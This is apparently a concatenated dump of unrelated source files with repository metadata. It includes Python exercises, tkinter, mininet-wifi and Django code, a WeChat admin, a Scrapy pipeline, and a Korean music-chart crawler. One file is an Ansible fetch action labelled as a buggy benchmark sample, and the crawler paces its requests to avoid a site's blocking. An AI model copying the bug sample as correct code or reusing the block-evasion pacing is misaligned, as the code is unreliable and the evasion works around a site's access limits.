| 2022-11-27T17:14:00.949163 | 2020-08-03T22:11:19 | 2020-08-03T22:11:19 | 284,564,300 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,083 |
py
|
# dictionaries exercise: student grade registration
print('--' * 17)
print(' CADASTRO DE NOTAS')
print('--' * 17)
aluno = dict()
aluno['nome'] = str(input('Nome: ')).strip().capitalize()
aluno['med'] = float(input('Média de {}: '.format(aluno['nome'])))
print()
print(f' - O nome é {aluno["nome"]}.\n'
      f' - A média é {aluno["med"]:.2f}.')
# classification: >= 7 approved, 5 to <7 retake ("recuperação"), else failed
if aluno['med'] >= 7:
    print(' - Situação: APROVADO!')
    aluno['situação'] = 'aprovado'
elif 5 <= aluno['med'] < 7:
    print(' - Situação: RECUPERAÇÃO!')
    aluno['situação'] = 'recuperação'
else:
    print(' - Situação: REPROVADO!')
    aluno['situação'] = 'reprovado'
print()
print(aluno)
# alternative solution kept by the author (inert string literal, never executed):
'''aluno = dict()
aluno['nome'] = str(input('Nome: ')).strip().capitalize()
aluno['med'] = float(input(f'Média de {aluno["nome"]} '))
if aluno['med'] >= 7:
    aluno['situação'] = 'Aprovado'
elif 5 <= aluno['med'] < 7:
    aluno['situação'] = 'Recuperação'
else:
    aluno['situação'] = 'Reprovado'
print('--' * 30)
for k, v in aluno.items():
    print(f' - {k} é igual a {v}')'''
|
[
"[email protected]"
] | |
4345f43ceebfae6bf9b4514241a243202d936d70
|
6d71de4e88dcb7d04f6d3a18736d393e12f8d087
|
/scripts/packages/mylistbox.py
|
27d62cd97b87fe9edbbcf35263ca9292f8eac3c9
|
[
"MIT"
] |
permissive
|
wyolum/Alex
|
71075c30691229e8eb28afa06a6ab44c450b14d4
|
03f1d8ae0107454d18964e33777ffc4c0c1a1951
|
refs/heads/main
| 2023-07-02T16:11:57.088323 | 2021-08-05T17:59:04 | 2021-08-05T17:59:04 | 338,686,528 | 10 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,551 |
py
|
#https://tk-tutorial.readthedocs.io/en/latest/listbox/listbox.html
import tkinter as tk
def listbox(parent, items, item_clicked, item_selected, n_row=40):
    """Build a searchable Listbox inside `parent` and return its Frame.

    item_clicked(text) fires on single click / selection change;
    item_selected(text) additionally fires on double click. The frame
    re-exports the listbox's get/insert/delete/index methods.
    """
    def myclick(event=None):
        # Copy the clicked entry into the search box and notify the caller.
        idx = lb.curselection()
        if idx:
            out = lb.get(idx)
            search.delete(0, tk.END)
            search.insert(0, out)
            item_clicked(out)
    def myselect(event):
        # Double click: behave like a click, then fire the select callback.
        myclick(event)
        idx = lb.curselection()
        out = lb.get(idx)
        item_selected(out)
    def search_changed(*args):
        # Case-insensitive substring filter. Currently inert: the trace
        # below that would wire it to the entry is commented out.
        search_str = search_var.get()
        i = 0
        lb.delete(0, tk.END)
        for item in items:
            if search_str.lower() in item.lower():
                lb.insert(i, item)
                i += 1
    frame = tk.Frame(parent)
    search_var = tk.StringVar()
    #search_var.trace('w', search_changed)
    search = tk.Entry(frame, width=40, textvariable=search_var)
    search.grid(row=1, column=0)
    var = tk.StringVar(value=items)
    lb = tk.Listbox(frame, listvariable=var, selectmode='single', height=n_row, width=40)
    lb.grid(row=2, column=0)
    lb.bind('<<ListboxSelect>>', myclick)
    lb.bind('<Double-Button-1>', myselect)
    # re-export the listbox API on the containing frame for convenience
    frame.get = lb.get
    frame.insert = lb.insert
    frame.delete = lb.delete
    frame.index = lb.index
    return frame
def click(*args):
print('click', args)
def select(*args):
print('select', args)
if __name__ == '__main__':
root = tk.Tk()
frame = listbox(root, dir(tk), click, select)
frame.grid()
root.mainloop()
|
[
"[email protected]"
] | |
e2fdf25b7497cc5c1fcb0bf489b3eb9332e5bb62
|
5faa3f139f30c0d290e327e04e3fd96d61e2aabb
|
/mininet-wifi/SWITCHON-2015/allWirelessNetworksAroundUs.py
|
4e0c7e784e0db877764da170ac32d83db2baa977
|
[] |
no_license
|
hongyunnchen/reproducible-research
|
c6dfc3cd3c186b27ab4cf25949470b48d769325a
|
ed3a7a01b84ebc9bea96c5b02e0c97705cc2f7c6
|
refs/heads/master
| 2021-05-07T08:24:09.586976 | 2017-10-31T13:08:05 | 2017-10-31T13:08:05 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,525 |
py
|
#!/usr/bin/python
"""This example is based on this video: https://www.youtube.com/watch?v=_C4H2gBdyQY"""
from mininet.net import Mininet
from mininet.node import Controller, OVSKernelSwitch, OVSKernelAP
from mininet.link import TCLink
from mininet.cli import CLI
from mininet.log import setLogLevel
import os
def topology():
"Create a network."
net = Mininet( controller=Controller, link=TCLink, switch=OVSKernelSwitch, accessPoint=OVSKernelAP )
print "*** Creating nodes"
sta1 = net.addStation( 'sta1', wlans=2, ip='10.0.0.2/8', max_x=120, max_y=50, min_v=1.4, max_v=1.6 )
h1 = net.addHost( 'h1', mac='00:00:00:00:00:01', ip='10.0.0.1/8' )
ap1 = net.addAccessPoint( 'ap1', ssid='ssid_ap1', mode= 'g', channel=6, position='70,25,0' )
ap2 = net.addAccessPoint( 'ap2', ssid='ssid_ap2', mode= 'g', channel=1, position='30,25,0' )
ap3 = net.addAccessPoint( 'ap3', ssid='ssid_ap3', mode= 'g', channel=11, position='110,25,0' )
s4 = net.addSwitch( 's4', mac='00:00:00:00:00:10' )
c1 = net.addController( 'c1', controller=Controller )
print "*** Configuring wifi nodes"
net.configureWifiNodes()
print "*** Associating and Creating links"
net.addLink(ap1, s4)
net.addLink(ap2, s4)
net.addLink(ap3, s4)
net.addLink(s4, h1)
sta1.cmd('modprobe bonding mode=3')
sta1.cmd('ip link add bond0 type bond')
sta1.cmd('ip link set bond0 address 02:01:02:03:04:08')
sta1.cmd('ip link set sta1-wlan0 down')
sta1.cmd('ip link set sta1-wlan0 address 00:00:00:00:00:11')
sta1.cmd('ip link set sta1-wlan0 master bond0')
sta1.cmd('ip link set sta1-wlan1 down')
sta1.cmd('ip link set sta1-wlan1 address 00:00:00:00:00:12')
sta1.cmd('ip link set sta1-wlan1 master bond0')
sta1.cmd('ip addr add 10.0.0.10/8 dev bond0')
sta1.cmd('ip link set bond0 up')
'seed'
net.seed(12)
'plotting graph'
net.plotGraph(max_x=140, max_y=140)
"*** Available models: RandomWalk, TruncatedLevyWalk, RandomDirection, RandomWaypoint, GaussMarkov ***"
net.startMobility(startTime=0, model='RandomDirection')
print "*** Starting network"
net.build()
c1.start()
s4.start( [c1] )
ap1.start( [c1] )
ap2.start( [c1] )
ap3.start( [c1] )
sta1.cmd('ip addr del 10.0.0.2/8 dev sta1-wlan0')
os.system('ovs-ofctl add-flow s4 actions=normal')
print "*** Running CLI"
CLI( net )
print "*** Stopping network"
net.stop()
if __name__ == '__main__':
setLogLevel( 'info' )
topology()
|
[
"[email protected]"
] | |
fc10948d86708b6f47a13b0e303228135646e05a
|
e76f6fdb1a2ea89d4f38ac1ed28e50a7625e21b7
|
/qytdjg_learning/views/Form.py
|
f0c4967d53b2ea07c09c61e006a240cff2f1d5c2
|
[] |
no_license
|
collinsctk/qytdjg_learning
|
4d61a2a236f0bc4bf9be8d999352a8e3c1b87408
|
72a6d6153f6ca6bf9fccad76612450fdaf83d9fd
|
refs/heads/master
| 2020-03-24T19:45:31.145059 | 2018-07-31T06:51:14 | 2018-07-31T06:51:14 | 142,943,470 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,628 |
py
|
#!/usr/bin/env python3
# -*- coding=utf-8 -*-
# 本脚由亁颐堂现任明教教主编写,用于乾颐盾Python课程!
# 教主QQ:605658506
# 亁颐堂官网www.qytang.com
# 教主技术进化论拓展你的技术新边疆
# https://ke.qq.com/course/271956?tuin=24199d8a
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.shortcuts import render
# 表单
# 获取客户端请求的相关信息
def requestInfo(request):
result = 'path: %s ' % request.path
result = result + '<br>host: %s ' % request.get_host()
result = result + '<br>full_path %s ' % request.get_full_path()
result = result + '<br>port: %s ' % request.get_port()
result = result + '<br>https: %s ' % request.is_secure()
# request.META: Python字典, 包含所有HTTP请求头
try:
result = result + '<br>Accept: %s ' % request.META['HTTP_ACCEPT']
except KeyError:
result = result + '<br>HTTP请求头获取异常'
# 下面是展示META内部的键值
# values = request.META.items()
# sorted(values)
# html = []
# for key,value in values:
# html.append('<tr><td>%s</td><td>%s</td></tr>' % (key,value))
#
# return HttpResponse('<table>%s</table>' % '\n'.join(html))
return HttpResponse(result)
# 处理表单(Form)提交的数据
def searchForm(request):
return render_to_response('search_form.html')
# def search(request):
# if 'name' in request.GET:
# message = 'You searched for:%s' % request.GET['name']
# else:
# message = 'You submmited an empty form.'
# return HttpResponse(message)
# 从数据库查询数据
from mt.models import Movie
# def search(request):
# if 'name' in request.GET:
# name = request.GET['name']
# movies = Movie.objects.filter(type__icontains=name)
# return render_to_response('search_results.html', {'movies':movies, 'query':name})
# else:
# return HttpResponse('Pls submit a search term.')
# 改进表单
def search(request):
if 'name' in request.GET:
name = request.GET['name']
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext.html', {'movies':movies, 'query':name})
else:
return render_to_response('search_form_ext.html', {'error':True})
# 简单的表单校验
def searchVerify1(request):
error = False
if 'name' in request.GET:
name = request.GET['name']
# name必须有值
if not name:
error = True
elif len(name) > 10:
error = True
else:
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext_verify.html', {'movies':movies, 'query':name})
return render_to_response('search_form_ext_verify.html', {'error':True})
def searchVerify(request):
errors = []
if 'name' in request.GET:
name = request.GET['name']
# name必须有值
if not name:
errors.append('请输入电影类型名')
elif len(name) > 10:
errors.append('电影类型名长度不能大于10')
else:
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext_verify2.html', {'movies':movies, 'query':name})
return render_to_response('search_form_ext_verify2.html', {'errors':errors})
# 复杂的表单校验
def searchVerifyad(request):
errors = []
if 'name' in request.GET:
name = request.GET['name']
value1 = request.GET['value1']
value2 = request.GET['value2']
# name必须有值
if not name:
errors.append('请输入电影类型名')
if not value1:
errors.append('必须提供value1')
if not value2:
errors.append('必须提供value2')
if not errors:
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext_verifad.html', {'movies':movies, 'query':name})
return render_to_response('search_form_ext_verifyad.html', {'errors':errors})
# 编写Form类
# django.forms.Form
# 在视图中使用Form对象
from mt.forms import MyForm
# from django.views.decorators.csrf import csrf_exempt
# @csrf_exempt
# from django.views.decorators.csrf import csrf_protect
# from django.middleware.csrf import get_token
# @csrf_protect
# def contact(request):
# # print(get_token(request))
# if request.method == 'POST':
# form = MyForm(request.POST)
# if form.is_valid():
# print('完成与业务相关的工作')
# return HttpResponse('OK')
# else:
# return render_to_response('my_form.html',{'form':form, 'csrf_token':get_token(request)})
# else:
# form = MyForm(initial={'name':'秦柯', 'email':'[email protected]', 'message':'没有信息'}) # 初始值
# return render_to_response('my_form.html',{'form':form, 'csrf_token':get_token(request)})
# 处理CSRF问题
def contact(request):
# print(get_token(request))
if request.method == 'POST':
form = MyForm(request.POST)
if form.is_valid():
print('完成与业务相关的工作')
return HttpResponse('OK')
else:
return render(request,'my_form.html',{'form':form})
else:
form = MyForm(initial={'name':'秦柯', 'email':'[email protected]', 'message':'没有信息'}) # 初始值
return render(request,'my_form.html',{'form':form})
if __name__ == "__main__":
pass
|
[
"[email protected]"
] | |
775c3d99a00861bd1974087e2fe75b1216b73fe6
|
421b0ae45f495110daec64ed98c31af525585c2c
|
/File_Handling/first_file.py
|
53c72b560b6263d87c4f8e3ce01570d86ad5fb4f
|
[] |
no_license
|
Pradeepsuthar/pythonCode
|
a2c87fb64c79edd11be54c2015f9413ddce246c4
|
14e2b397f69b3fbebde5b3af98898c4ff750c28c
|
refs/heads/master
| 2021-02-18T05:07:40.402466 | 2020-03-05T13:14:15 | 2020-03-05T13:14:15 | 245,163,673 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 528 |
py
|
# python provied function and methos to preform such as creating, reading, opening, closing etc.
# open file in python
# Syntax
# fileobject = open(file_name[,access_mode][,buffring])
# NOTE : Default access_mode is read
# Create/Open file in write mode
# fw = open("emp.txt","w")
# write data into file
# fw.write("324156\n")
# fw.write("Pradeep Suthar\n")
# fw.write(input("Enter mobile Number : "))
# fw.close()
print("Reading file\n")
fr = open("emp.txt")
data = fr.read()
fr.close()
print("\n",data)
|
[
"[email protected]"
] | |
aea70b7bae784283e27efb8fb4f2bc809628cb32
|
9bf62c04522b6b28e4d4bedd25654d0ea675f72a
|
/wechat_django/admin/views/menu.py
|
38ce85ed5fd22d128e4d83ff133787061ea61e5f
|
[
"MIT"
] |
permissive
|
x2x4com/wechat-django
|
9a46cd34c4a00f515e2e315d51d6475e509ad9f0
|
926e5d2ed2895d30a253504ff252a7a52fcfe81f
|
refs/heads/master
| 2020-05-20T02:31:08.735986 | 2019-05-01T16:03:31 | 2019-05-01T16:03:31 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,832 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import forms
from django.contrib import messages
from django.urls import reverse
from django.utils.http import urlencode
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
import object_tool
from wechatpy.exceptions import WeChatClientException
from ...models import Menu
from ..utils import get_request_params
from ..base import DynamicChoiceForm, WeChatModelAdmin
class MenuAdmin(WeChatModelAdmin):
__category__ = "menu"
__model__ = Menu
changelist_object_tools = ("sync", "publish")
change_form_template = "admin/wechat_django/menu/change_form.html"
change_list_template = "admin/wechat_django/menu/change_list.html"
list_display = (
"operates", "id", "parent_id", "title", "type", "detail", "weight",
"updated_at")
list_display_links = ("title",)
list_editable = ("weight", )
fields = (
"name", "type", "key", "url", "appid", "pagepath", "created_at",
"updated_at")
def title(self, obj):
if obj.parent:
return "|--- " + obj.name
return obj.name
title.short_description = _("title")
@mark_safe
def detail(self, obj):
rv = ""
if obj.type == Menu.Event.CLICK:
rv = obj.content.get("key")
elif obj.type == Menu.Event.VIEW:
rv = '<a href="{0}">{1}</a>'.format(
obj.content.get("url"), _("link"))
elif obj.type == Menu.Event.MINIPROGRAM:
rv = obj.content.get("appid")
return rv or ""
detail.short_description = _("detail")
@mark_safe
def operates(self, obj):
del_url = reverse("admin:wechat_django_menu_delete", kwargs=dict(
object_id=obj.id,
wechat_app_id=obj.app_id
))
rv = '<a class="deletelink" href="{0}"></a>'.format(del_url)
if not obj.parent and not obj.type and obj.sub_button.count() < 5:
query = dict(parent_id=obj.id)
add_link = reverse("admin:wechat_django_menu_add", kwargs=dict(
wechat_app_id=obj.app_id
))
add_url = "{0}?{1}".format(add_link, urlencode(query))
rv += '<a class="addlink" href="{0}"></a>'.format(add_url)
return rv
operates.short_description = _("actions")
@object_tool.confirm(short_description=_("Sync menus"))
def sync(self, request, obj=None):
self.check_wechat_permission(request, "sync")
def action():
Menu.sync(request.app)
return _("Menus successful synchronized")
return self._clientaction(
request, action, _("Sync menus failed with %(exc)s"))
@object_tool.confirm(short_description=_("Publish menus"))
def publish(self, request, obj=None):
self.check_wechat_permission(request, "sync")
def action():
Menu.publish(request.app)
return _("Menus successful published")
return self._clientaction(
request, action, _("Publish menus failed with %(exc)s"))
def get_actions(self, request):
actions = super(MenuAdmin, self).get_actions(request)
if "delete_selected" in actions:
del actions["delete_selected"]
return actions
def get_fields(self, request, obj=None):
fields = list(super(MenuAdmin, self).get_fields(request, obj))
if not obj:
fields.remove("created_at")
fields.remove("updated_at")
return fields
def get_readonly_fields(self, request, obj=None):
rv = super(MenuAdmin, self).get_readonly_fields(request, obj)
if obj:
rv = rv + ("created_at", "updated_at")
return rv
def get_queryset(self, request):
rv = super(MenuAdmin, self).get_queryset(request)
if not get_request_params(request, "menuid"):
rv = rv.filter(menuid__isnull=True)
if request.GET.get("parent_id"):
rv = rv.filter(parent_id=request.GET["parent_id"])
return rv
class MenuForm(DynamicChoiceForm):
content_field = "content"
origin_fields = ("name", "menuid", "type", "weight")
type_field = "type"
key = forms.CharField(label=_("menu key"), required=False)
url = forms.URLField(label=_("url"), required=False)
appid = forms.CharField(label=_("miniprogram app_id"), required=False)
pagepath = forms.CharField(label=_("pagepath"), required=False)
class Meta(object):
model = Menu
fields = ("name", "menuid", "type", "weight")
def allowed_fields(self, type, cleaned_data):
if type == Menu.Event.VIEW:
fields = ("url", )
elif type == Menu.Event.CLICK:
fields = ("key", )
elif type == Menu.Event.MINIPROGRAM:
fields = ("url", "appid", "apppath")
else:
fields = tuple()
return fields
form = MenuForm
def save_model(self, request, obj, form, change):
if not change and request.GET.get("parent_id"):
obj.parent_id = request.GET["parent_id"]
return super().save_model(request, obj, form, change)
def has_add_permission(self, request):
if not super(MenuAdmin, self).has_add_permission(request):
return False
# 判断菜单是否已满
q = self.get_queryset(request)
if request.GET.get("parent_id"):
return q.count() < 5
else:
return q.filter(parent_id__isnull=True).count() < 3
def get_model_perms(self, request):
return (super(MenuAdmin, self).get_model_perms(request)
if request.app.abilities.menus else {})
|
[
"[email protected]"
] | |
d6e214d0a8d4d12652eee9f7bca72966d79550f4
|
f9684c301ce50a6bbb5a75280cd4c70277119f27
|
/yelpdetails/yelpdetails/pipelines.py
|
55531cab7d87353200bd42058134f3e8878cb6be
|
[] |
no_license
|
vaibhav89000/yelpdetails
|
76149f2feed5cbad98b3e67d3a786223289fc1f4
|
b7ce6f739a7f76fbe665e27eb097475775c0c489
|
refs/heads/master
| 2022-11-25T05:09:56.803075 | 2020-07-06T12:45:54 | 2020-07-06T12:45:54 | 269,969,213 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,379 |
py
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
import sqlite3
class YelpdetailsPipeline(object):
def __init__(self):
self.create_connection()
self.create_table()
def create_connection(self):
self.conn = sqlite3.connect("yelpdetails.db")
self.curr = self.conn.cursor()
def create_table(self):
self.curr.execute("""DROP TABLE IF EXISTS detail""")
self.curr.execute("""create table detail(
Name text,
website_link text,
website_name text,
phone text,
Direction text,
category text,
find text,
near text,
email text,
website text
)""")
# pass
def process_item(self, item, spider):
self.store_db(item)
return item
def store_db(self,item):
self.curr.execute("""insert into detail values (?,?,?,?,?,?,?,?,?,?)""",(
item['Name'],
item['website_link'],
item['website_name'],
item['phone'],
item['Direction'],
item['category'],
item['find'],
item['near'],
item['email'],
item['website']
))
self.conn.commit()
|
[
"[email protected]"
] | |
a927ca2edd90ae07adf56559bbfe6b40379ae5cb
|
f07a42f652f46106dee4749277d41c302e2b7406
|
/Data Set/bug-fixing-2/f57f33a8e73d1ac10b3eb6b4333e635c1608bc27-<run>-bug.py
|
8fd0e05b5b4b4ec324c3a6a1b7cf88dccfc0d38a
|
[] |
no_license
|
wsgan001/PyFPattern
|
e0fe06341cc5d51b3ad0fe29b84098d140ed54d1
|
cc347e32745f99c0cd95e79a18ddacc4574d7faa
|
refs/heads/main
| 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,670 |
py
|
def run(self, tmp=None, task_vars=None):
' handler for fetch operations '
if (task_vars is None):
task_vars = dict()
result = super(ActionModule, self).run(tmp, task_vars)
if self._play_context.check_mode:
result['skipped'] = True
result['msg'] = 'check mode not (yet) supported for this module'
return result
source = self._task.args.get('src', None)
dest = self._task.args.get('dest', None)
flat = boolean(self._task.args.get('flat'))
fail_on_missing = boolean(self._task.args.get('fail_on_missing'))
validate_checksum = boolean(self._task.args.get('validate_checksum', self._task.args.get('validate_md5')))
if (('validate_md5' in self._task.args) and ('validate_checksum' in self._task.args)):
result['failed'] = True
result['msg'] = 'validate_checksum and validate_md5 cannot both be specified'
return result
if ((source is None) or (dest is None)):
result['failed'] = True
result['msg'] = 'src and dest are required'
return result
source = self._connection._shell.join_path(source)
source = self._remote_expand_user(source)
remote_checksum = None
if (not self._play_context.become):
remote_checksum = self._remote_checksum(source, all_vars=task_vars)
remote_data = None
if (remote_checksum in ('1', '2', None)):
slurpres = self._execute_module(module_name='slurp', module_args=dict(src=source), task_vars=task_vars, tmp=tmp)
if slurpres.get('failed'):
if ((not fail_on_missing) and (slurpres.get('msg').startswith('file not found') or (remote_checksum == '1'))):
result['msg'] = 'the remote file does not exist, not transferring, ignored'
result['file'] = source
result['changed'] = False
else:
result.update(slurpres)
return result
else:
if (slurpres['encoding'] == 'base64'):
remote_data = base64.b64decode(slurpres['content'])
if (remote_data is not None):
remote_checksum = checksum_s(remote_data)
remote_source = slurpres.get('source')
if (remote_source and (remote_source != source)):
source = remote_source
if (os.path.sep not in self._connection._shell.join_path('a', '')):
source = self._connection._shell._unquote(source)
source_local = source.replace('\\', '/')
else:
source_local = source
dest = os.path.expanduser(dest)
if flat:
if dest.endswith(os.sep):
base = os.path.basename(source_local)
dest = os.path.join(dest, base)
if (not dest.startswith('/')):
dest = self._loader.path_dwim(dest)
else:
if ('inventory_hostname' in task_vars):
target_name = task_vars['inventory_hostname']
else:
target_name = self._play_context.remote_addr
dest = ('%s/%s/%s' % (self._loader.path_dwim(dest), target_name, source_local))
dest = dest.replace('//', '/')
if (remote_checksum in ('0', '1', '2', '3', '4')):
if (remote_checksum == '0'):
result['msg'] = 'unable to calculate the checksum of the remote file'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '1'):
if fail_on_missing:
result['failed'] = True
result['msg'] = 'the remote file does not exist'
result['file'] = source
else:
result['msg'] = 'the remote file does not exist, not transferring, ignored'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '2'):
result['msg'] = 'no read permission on remote file, not transferring, ignored'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '3'):
result['msg'] = 'remote file is a directory, fetch cannot work on directories'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '4'):
result['msg'] = "python isn't present on the system. Unable to compute checksum"
result['file'] = source
result['changed'] = False
return result
local_checksum = checksum(dest)
if (remote_checksum != local_checksum):
makedirs_safe(os.path.dirname(dest))
if (remote_data is None):
self._connection.fetch_file(source, dest)
else:
try:
f = open(to_bytes(dest, errors='strict'), 'w')
f.write(remote_data)
f.close()
except (IOError, OSError) as e:
raise AnsibleError(('Failed to fetch the file: %s' % e))
new_checksum = secure_hash(dest)
try:
new_md5 = md5(dest)
except ValueError:
new_md5 = None
if (validate_checksum and (new_checksum != remote_checksum)):
result.update(dict(failed=True, md5sum=new_md5, msg='checksum mismatch', file=source, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum))
else:
result.update(dict(changed=True, md5sum=new_md5, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum))
else:
try:
local_md5 = md5(dest)
except ValueError:
local_md5 = None
result.update(dict(changed=False, md5sum=local_md5, file=source, dest=dest, checksum=local_checksum))
return result
|
[
"[email protected]"
] | |
c3538eb3371b01aba72df474025a27cb07554102
|
bb160d2fc2c6182c4ca56c8e4635a14215f8c70f
|
/test_module/collector_test.py
|
d89697bcb6a78e55d06285541f3c33103c1160c4
|
[] |
no_license
|
bitacademy-howl/Music_Recommendation_mod
|
9464ed941ff722123457ba18cf35bccee3640b9b
|
94a430df1c65dc4b930f46ade4576bff95b6c27e
|
refs/heads/master
| 2020-03-27T15:18:21.725593 | 2018-11-05T08:55:45 | 2018-11-05T08:55:45 | 146,709,303 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,630 |
py
|
import datetime
import time
from bs4 import BeautifulSoup
import modules.collection.crawler as cw
from db_accessing import *
from db_accessing.VO import Music_VO, Artist_VO, Album_VO
from modules.collection.urlMaker import UrlMaker
class Collector:
def crawling_mnet_month_chart(url):
# crawling_from_chart
# mnet monthly chart 로부터 음원 데이터를 긁어오는 과정...
# VO 객체들
artistVO = Artist_VO()
albumVO = Album_VO()
musicVO = Music_VO()
html = cw.crawling(url=url)
bs = BeautifulSoup(html, 'html.parser')
#####################################################################################################################
# VO 값 입력
tag_music_list = bs.find('div', attrs={'class': 'MMLTable jQMMLTable'})
tag_tbody = tag_music_list.find('tbody')
tags_tr = tag_tbody.findAll('tr')
print("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
for tag_tr in tags_tr:
# item_title 태그내 정보들...
item_title_tag_td = tag_tr.find('td', attrs={'class': 'MMLItemTitle'})
# 8개 해야된다......
# 음원의 고유 아이디
musicVO.Music_ID = tag_tr.find('td', attrs={'class': 'MMLItemCheck'}).find('input')["value"]
musicVO.Music_Title = item_title_tag_td.find('a', attrs={'class': 'MMLI_Song'}).get_text()
album_tag = item_title_tag_td.find('a', attrs={'class': 'MMLIInfo_Album'})
artist_tag = item_title_tag_td.find('a', attrs={'class': 'MMLIInfo_Artist'})
print(album_tag)
print(artist_tag)
if album_tag != None:
albumVO.Album_Title = album_tag.get_text()
albumVO.Album_Node = album_tag["href"].strip(" ")
albumVO.Album_ID = int(albumVO.Album_Node.rsplit('/', 1)[1])
musicVO.Album_ID = albumVO.Album_ID
if artist_tag != None:
artistVO.Artist_Name = artist_tag.get_text()
# 객체 및 테이블에 노드 추가 할 것!
artistVO.Artist_Node = artist_tag["href"].strip(" ")
artistVO.Artist_ID = int(artistVO.Artist_Node.rsplit('/', 1)[1])
albumVO.Singer_ID = artistVO.Artist_ID
# #######commit 계속 안하고 한방에 못하는지 알아보고, ORM 객체 내 객체 포함...으로 알아볼 것!!!
# 양방향 머시기 하는듯...
db_session.merge(artistVO)
db_session.commit()
db_session.merge(albumVO)
db_session.commit()
db_session.merge(musicVO)
db_session.commit()
def crawling_track(url):
# 값을 입력할 VO 객체 생성
musicVO = Music_VO()
albumVO = Album_VO()
artistVO = Artist_VO()
# Music_ID 는 링크로부터 채워서 올것!
# Music_VO.Music_ID =
# bs from html response....
html = cw.crawling(url=url)
bs = BeautifulSoup(html, 'html.parser')
tag_music_info = bs.find('div', attrs={'class': 'music_info_view'})
# 곡 소개 테이블
summary = tag_music_info.find('div', attrs={'class': 'music_info_cont'})
album_tag = summary.find('tbody').find('a')
if album_tag is not None:
albumVO.Album_Node = album_tag['href'].strip(" ")
albumVO.Album_ID = albumVO.Album_Node.rsplit('/', 1)[1]
musicVO.Album_ID = albumVO.Album_ID
artist_tag = bs.find('span', attrs={'class': 'artist_txt'}).find('a')
if artist_tag != None:
artistVO.Artist_Node = artist_tag['href'].strip(" ")
artistVO.Artist_ID = artistVO.Artist_Node.rsplit('/', 1)[1]
artistVO.Artist_Name = artist_tag.get_text()
albumVO.Singer_ID = artistVO.Artist_ID
attrs = summary.find('li', attrs={'class': 'left_con'}).findAll('p', attrs={'class' : 'right'})
def crawling_artist(id):
artistVO = Artist_VO()
artistVO.Artist_ID = id
artistVO.Artist_Node = '/artist/{0}'.format(id)
artistVO.Group = False
url = ''.join(['http://www.mnet.com', artistVO.Artist_Node])
html = cw.crawling(url)
bs = BeautifulSoup(html, 'html.parser')
tag_artist_info = bs.find('div', attrs={'class': 'artist_info'})
if tag_artist_info is not None:
singer = tag_artist_info.find('a', attrs={'class': 'song_name'})
if singer is not None:
artistVO.Artist_Name = singer.get_text()
else:
artistVO.Artist_Name = tag_artist_info.find('li', attrs={'class': 'top_left'}).find(
'p').get_text().strip()
print("############# strip 결과 #############\n", artistVO.Artist_Name,
"\n############# strip 결과 #############\n")
a = tag_artist_info.find('div', attrs={'class': 'a_info_cont'})
tags = tag_artist_info.findAll('span', attrs={'class': 'right'})
for tag in tags:
if tag is not None:
text_list = tag.get_text().strip().replace(' ', '').replace('\r', '').replace('\n', '').replace(
'\t', '').replace('\xa0', '').split('|')
print(text_list)
for text in text_list:
if text == '남성' or text == '여성' or text == '혼성':
artistVO.Gender = text
if text == '그룹':
artistVO.Group = True
db_session.merge(artistVO)
db_session.commit()
time.sleep(0.5) # sleep 안주면 200 번째 request 이후 차단됨...
# 방화벽 or IPS
# 메인에서 호출할 함수들.....
def collecting_artist(self):
for id in range(1, 3000000, 1):
self.crawling_artist(id)
def collecting_track(self, node):
um = UrlMaker()
row_num_table = Music_VO.qurey.count()
for offs in range(0, row_num_table, 10):
result = Music_VO.query.limit(10).offset(offs).all()
for i in result:
self.crawling_track(um.direct_node_connect(i.Music_Node))
def collecting_chart(self):
um = UrlMaker()
for year in range(self.start_date.year, self.end_date.year+1):
for month in range(self.start_date.month, self.end_date.month+1):
try:
um.setDate(datetime.date(year, month, day=1))
um.url_maker_DATE_based()
for page_number in range(1, 3):
url = "".join([um.url_maker_DATE_based(), '?pNum=%d' % page_number])
print(url)
Collector.crawling_mnet_month_chart(url)
except ValueError:
break
# def __init__(self, start_date=datetime.date(2009, 1, 1), end_date=datetime.datetime.now().date()):
# # def __init__(self, start_date = datetime.date(2009, 1, 1), end_date = datetime.datetime.now().date()):
# self.start_date = start_date
# self.end_date = end_date
def __init__(self):
self.set_start_date()
self.end_date = datetime.datetime.now().date()
def set_start_date(self, year = 2009, month = 8, day = 1):
self.start_date = datetime.date(2009, 8, 1)
def set_end_date(self, year, month, day):
self.end_date = datetime.date(year, month, day)
|
[
"[email protected]"
] | |
62ccef834d24c047c8d8308cd15dcbfcacd02062
|
49663ea34b41c8180d7484f778f5cad2e701d220
|
/tests/restapi/conftest.py
|
8915e5344b0b69e02c6d33ddb2f2045958be013b
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
stepanblyschak/sonic-mgmt
|
ed08c98e7bff1615b057daa8711686aa5986073d
|
a1ae1e0b4e9927e6f52916f76121780d19ec3e54
|
refs/heads/master
